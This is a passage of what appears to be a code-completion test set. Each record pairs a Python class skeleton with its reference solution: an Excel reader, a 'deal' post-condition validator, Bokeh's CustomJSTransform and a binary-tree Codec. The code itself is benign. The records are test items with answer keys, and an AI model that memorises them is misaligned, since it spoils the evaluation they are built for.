else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000248", "length_bytes": 1323, "license_type": "no_license", "methods": [{"docstring": "获取excel工作表", "name": "__init__", "signature": "def __init__(self, excel_path=None, sheet_name=None)"}, {"docstring": "获取文件数据 每一行数据一个list,所有的数据一个大list :return:", "name": "get_data", "signature": "def get_data(self) -> object"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000025", "prompt": "Implement the Python class `ExcelUtil` described below.\n\nClass description:\nImplement the ExcelUtil class.\n\nMethod signatures and docstrings:\n- def __init__(self, excel_path=None, sheet_name=None): 获取excel工作表\n- def get_data(self) -> object: 获取文件数据 每一行数据一个list,所有的数据一个大list :return:", "prompted_full_text": "Implement the Python class `ExcelUtil` described below.\n\nClass description:\nImplement the ExcelUtil class.\n\nMethod signatures and docstrings:\n- def __init__(self, excel_path=None, sheet_name=None): 获取excel工作表\n- def get_data(self) -> object: 获取文件数据 每一行数据一个list,所有的数据一个大list :return:\n\n<|skeleton|>\nclass ExcelUtil:\n\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n <|body_0|>\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n<|end_body_0|>\n\n<|body_start_1|>\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n<|end_body_1|>\n", "revision_id": "5f843531d413202f4f4e48ed0c3d510db21f4396", "skeleton": "<|skeleton|>\nclass ExcelUtil:\n\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n <|body_0|>\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExcelUtil:\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n", "source": "the_stack_v2_python_sparse", "source_path": "pycharm/digiin/common/ExcelUtil.py", "source_repo": "yz9527-1/1YZ", "split": "test", "star_events_count": 0} {"blob_id": "f49958df4e894b6174bc048589695948bde0c3d5", "bodies": ["result = self.function(*args, **kwargs)\nself.validate(result)\nreturn result", "result = await self.function(*args, **kwargs)\nself.validate(result)\nreturn result", "for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result"], "bodies_text": "<|body_start_0|>\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n<|end_body_2|>\n", "class_docstring": "Check contract (validator) after function processing. Validate output result.", "class_name": "Post", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_0|>\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_1|>\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000249", "length_bytes": 1082, "license_type": "permissive", "methods": [{"docstring": "Step 3. Wrapped function calling.", "name": "patched_function", "signature": "def patched_function(self, *args, **kwargs)"}, {"docstring": "Step 3. Wrapped function calling.", "name": "async_patched_function", "signature": "async def async_patched_function(self, *args, **kwargs)"}, {"docstring": "Step 3. Wrapped function calling.", "name": "patched_generator", "signature": "def patched_generator(self, *args, **kwargs)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007032", "prompt": "Implement the Python class `Post` described below.\n\nClass description:\nCheck contract (validator) after function processing. Validate output result.\n\nMethod signatures and docstrings:\n- def patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- async def async_patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- def patched_generator(self, *args, **kwargs): Step 3. Wrapped function calling.", "prompted_full_text": "Implement the Python class `Post` described below.\n\nClass description:\nCheck contract (validator) after function processing. Validate output result.\n\nMethod signatures and docstrings:\n- def patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- async def async_patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- def patched_generator(self, *args, **kwargs): Step 3. Wrapped function calling.\n\n<|skeleton|>\nclass Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_0|>\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_1|>\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n<|end_body_2|>\n", "revision_id": "9dff86e1dc5c8607f02ded34b6d64e770f1959fa", "skeleton": "<|skeleton|>\nclass Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_0|>\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_1|>\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n", "source": "the_stack_v2_python_sparse", "source_path": "deal/_decorators/post.py", "source_repo": "toonarmycaptain/deal", "split": "test", "star_events_count": 0} {"blob_id": "6e131255a5e2cf2d58e865f0a736daa9d308d1e1", "bodies": ["from bokeh.util.deprecation import deprecated\ndeprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. Use CustomJSTransform directly instead.\")\nif not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\npscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\ndef pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\njsfunc, func_kwargs = pscript_compile(func)\nv_jsfunc, v_func_kwargs = pscript_compile(v_func)\nfunc_kwargs.update(v_func_kwargs)\nreturn cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)", "compiled = nodejs_compile(func, lang='coffeescript', file='???')\nif 'error' in compiled:\n raise CompilationError(compiled.error)\nv_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\nif 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\nreturn cls(func=compiled.code, v_func=v_compiled.code, args=args)"], "bodies_text": "<|body_start_0|>\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n<|end_body_1|>\n", "class_docstring": "Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.", "class_name": "CustomJSTransform", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n <|body_0|>\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000250", "length_bytes": 13400, "license_type": "permissive", "methods": [{"docstring": "Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat", "name": "from_py_func", "signature": "def from_py_func(cls, func, v_func)"}, {"docstring": "Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to", "name": "from_coffeescript", "signature": "def from_coffeescript(cls, func, v_func, args={})"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004772", "prompt": "Implement the Python class `CustomJSTransform` described below.\n\nClass description:\nApply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\n\nMethod signatures and docstrings:\n- def from_py_func(cls, func, v_func): Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\n- def from_coffeescript(cls, func, v_func, args={}): Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to", "prompted_full_text": "Implement the Python class `CustomJSTransform` described below.\n\nClass description:\nApply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\n\nMethod signatures and docstrings:\n- def from_py_func(cls, func, v_func): Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\n- def from_coffeescript(cls, func, v_func, args={}): Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\n\n<|skeleton|>\nclass CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n <|body_0|>\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n<|end_body_1|>\n", "revision_id": "1ad7ec05fb1e3676ac879585296c513c3ee50ef9", "skeleton": "<|skeleton|>\nclass CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n <|body_0|>\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n", "source": "the_stack_v2_python_sparse", "source_path": "Library/lib/python3.7/site-packages/bokeh-1.4.0-py3.7.egg/bokeh/models/transforms.py", "source_repo": "holzschu/Carnets", "split": "test", "star_events_count": 541} {"blob_id": "f67c0577c557fb3dd5ddcc6e9dc71d18a92b13fc", "bodies": ["def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\nreturn rserialize(root, '')", "def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\ndata_list = data.split(',')\nroot = rdeserialize(data_list)\nreturn root"], "bodies_text": "<|body_start_0|>\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n<|end_body_0|>\n\n<|body_start_1|>\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n<|end_body_0|>\n\n<|body_start_1|>\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000251", "length_bytes": 2602, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002352", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec 